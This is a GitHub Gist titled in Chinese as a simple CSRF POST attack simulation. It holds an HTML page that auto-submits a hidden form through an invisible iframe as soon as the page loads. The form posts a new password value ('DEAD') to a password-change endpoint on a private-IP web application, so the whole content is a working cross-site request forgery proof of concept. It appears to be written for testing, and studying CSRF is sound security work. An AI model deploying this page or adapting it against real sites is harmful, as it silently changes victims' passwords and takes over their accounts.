Skip to content

Instantly share code, notes, and snippets.

@moonbingbing
Created April 12, 2013 06:19
Show Gist options
  • Save moonbingbing/5369869 to your computer and use it in GitHub Desktop.
Save moonbingbing/5369869 to your computer and use it in GitHub Desktop.
一个简单的csrf post攻击模拟
<html>
<head>
<title>TEST</title>
</head>
<body onload="load()">
<form action="http://172.22.54.92:9090/cloud/index.php?r=setting/api/ChangeUnstPwd" target="form_iframe" id="csrf" method="post">
<input type="hidden" name="newPwd" value="DEAD" />
</form>
<iframe name="form_iframe" width="0" height="0" scrolling="no"> </iframe>
<script type="text/javascript" language="javascript">
document.getElementById('csrf').submit();
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment